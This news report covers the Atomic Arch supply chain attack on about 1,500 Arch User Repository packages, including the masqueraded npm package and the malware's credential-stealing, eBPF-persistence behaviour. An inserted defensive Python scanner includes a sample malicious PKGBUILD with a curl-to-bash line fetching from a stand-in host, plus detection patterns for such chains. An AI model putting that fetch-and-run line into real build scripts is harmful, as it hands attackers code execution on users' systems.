Atomic Arch Supply Chain Attack Hits 1,500 AUR Packages
SecurityWeek, archived Jun 16, 2026
Arch Linux suspended account registrations in response to the wave of malicious packages being uploaded to AUR.
Arch Linux on Monday announced that it has suspended new account registrations on the Arch User Repository (AUR) in response to a wave of malicious packages being published as part of an ongoing supply chain attack.
A community-driven repository, AUR enables Arch Linux users to share build scripts (PKGBUILDs) for software not in the official repositories, which can be cloned to build native packages locally.
The supply chain campaign, tracked by the cybersecurity community as Atomic Arch, started last week, with more than 1,500 malicious packages published by June 11.
“We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed,” Arch Linux said on Friday. On Monday, Arch Linux suspended AUR signups for cleanup purposes.
According to Sonatype, the campaign started with abandoned packages in AUR, which were modified to execute a malicious NPM package during installation. By June 12, the attackers switched to Bun-based installation paths and also started pushing new malicious packages.
By targeting orphaned packages that had a history of legitimate use, the attackers ensured the attack’s blast radius was large.
Similar to the modus operandi observed in the Axios supply chain attack, the hackers modified the packages’ PKGBUILD to introduce malicious behavior masquerading as the NPM package atomic-lockfile.
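As an added illustration, not code from the article or from Sonatype or StepSecurity, the following heuristic check flags the kind of PKGBUILD change described above (package-manager invocations such as npm or bun, download-and-execute chains, or the atomic-lockfile name appearing inside the functions makepkg runs) so a user can review a cloned AUR package before building it. The two PKGBUILD fragments, the indicator labels and the pattern list are constructed assumptions, not a vendor-supplied signature set.

```python
import re

# Constructed sample PKGBUILD fragments (not real AUR packages).
CLEAN = """
pkgname=example-tool
pkgver=1.2.0
source=("https://github.com/example/example-tool/archive/v$pkgver.tar.gz")
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}
package() {
  make DESTDIR="$pkgdir" install
}
"""
# Same package after a hypothetical malicious update of an orphaned PKGBUILD.
SUSPICIOUS = """
pkgname=example-tool
pkgver=1.2.1
source=("https://github.com/example/example-tool/archive/v$pkgver.tar.gz")
prepare() {
  npx atomic-lockfile --init >/dev/null 2>&1 || true
}
package() {
  curl -s https://example.invalid/x | bash
  make DESTDIR="$pkgdir" install
}
"""

# Indicators (assumed labels): JS package-manager execution, download piped
# into a shell, and the package name the article says was masqueraded.
PATTERNS = {
    "npm_bun_exec": re.compile(r"\b(npm|npx|bun|bunx)\b\s+\S"),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
    "atomic_lockfile": re.compile(r"atomic-lockfile"),
}
# Functions makepkg executes; anything before the first one is top-level.
FUNC_RE = re.compile(r"^(prepare|build|check|package)\s*\(\)\s*\{", re.M)

def audit_pkgbuild(text):
    """Return sorted (function, indicator) pairs found in a PKGBUILD."""
    parts = FUNC_RE.split(text)  # [top, name1, body1, name2, body2, ...]
    chunks = [("top-level", parts[0])] + list(zip(parts[1::2], parts[2::2]))
    return sorted({(fname, label) for fname, body in chunks
                   for label, rx in PATTERNS.items() if rx.search(body)})

def new_indicators(old, new):
    """Indicators introduced by an update, for reviewing a changed package."""
    return sorted(set(audit_pkgbuild(new)) - set(audit_pkgbuild(old)))
```

A hit is a prompt to read the PKGBUILD and its .install file by hand, not proof of compromise; legitimate Node-based packages also call npm during build().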
The Linux executable that runs during package installation as part of an Atomic Arch attack references eBPF (extended Berkeley Packet Filter), the technology that allows programs to run inside the Linux kernel with elevated privileges, likely for persistence purposes.
Sonatype also observed functionality related to process, file, and network hiding; Linux socket diagnostic interfaces; debugger detection; and HTTP upload functionality.
The rootkit-like malware also references credentials, SSH artifacts, HashiCorp Vault tokens, browser cookies, and data stores from popular collaboration applications, suggesting it was designed for credential and secret harvesting and exfiltration.
“On systems where it runs with elevated privileges, the malware can also attempt eBPF-based persistence to hide processes and file activity, making detection and cleanup significantly harder. A compromised host should be treated as fully untrusted: rebuild from clean media and rotate all exposed credentials. A one-off malware scan is not sufficient,” StepSecurity notes.
WRITTEN BY
Ionut Arghire
Ionut Arghire is an international correspondent for SecurityWeek.